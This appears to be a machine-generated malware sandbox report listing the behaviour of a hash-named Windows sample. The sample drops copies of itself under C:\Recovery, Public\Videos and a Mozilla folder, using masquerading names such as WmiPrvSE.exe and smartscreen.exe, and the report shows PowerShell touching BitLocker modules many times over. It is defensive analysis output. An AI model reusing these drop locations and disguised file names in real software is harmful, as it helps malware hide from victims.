Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\rreJQTki.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\ylgZbdUT.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\ttRrlCpd.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\EhviVOkL.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\aceLSxeO.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\KIRpkYvx.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\FNQYcsFE.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\WyUWCOVc.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\QyIevzpi.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\hILtgrfA.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\VoMNpBPa.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\DhiqiJKM.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\wjuqGuQY.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Recovery\WmiPrvSE.exe
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Downloads\smartscreen.exe
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\VWRNVcdg.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\bmmUfKkQ.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\RGFoMnqm.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\nGlBWAAq.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\IUzpLFaA.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\ArFrORkS.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\sBnSdgqk.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\qDaBeGpk.log

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
